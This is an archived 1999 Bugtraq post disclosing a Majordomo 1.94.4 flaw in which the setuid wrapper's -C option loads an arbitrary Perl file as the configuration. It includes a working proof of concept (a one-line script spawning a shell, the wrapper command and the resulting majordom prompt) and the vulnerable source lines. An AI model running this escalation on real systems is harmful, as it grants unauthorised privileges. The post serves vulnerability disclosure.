OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: $cf Security flaw

$cf Security flaw

Subject: $cf Security flaw
From: Shevek (shevekanarres.org)
Date: Thu Dec 02 1999 - 16:00:48 CST

I can get majordomo privelidges as a user.

shevektirin ~$ cat foo.pl
system("/bin/csh");
shevektirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom

roottirin /usr/local/majordomo# ls -ld .
drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./
roottirin /usr/local/majordomo# ls -l wrapper
-rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper*

The lines in Majordomo (I found the bug by simple inspection, it's also in
resend)

$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

while ($ARGV[0]) { # parse for config file or default list
    if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case
        $cf = $ARGV[1];
        shift(ARGV);
        shift(ARGV);
    } elsif ($ARGV[0] eq "-l") {
        $deflist = $ARGV[1];
        shift(ARGV);
        shift(ARGV);
    } else {
        die "Unknown argument $ARGV[0]\n";
    }
}
if (! -r $cf) {
    die("$cf not readable; stopped");
}

require "$cf";

Am I doing something wrong, or is this a general flaw? Can I simply
disable all the possible methods of setting $cf without breaking other
things? I haven't had time to inspect the system at any length, I just
glanced at it.

I am not on any greatcircle mailing lists, I would appreciate replies to
my own address if there is discussion on this subject.

Majordomo version 1.94.4
Perl 5.005_03

Ta.

S. 

--
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+
US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+
t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y?
Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.

This archive was generated by hypermail 2b27 : Wed Dec 29 1999 - 21:20:08 CST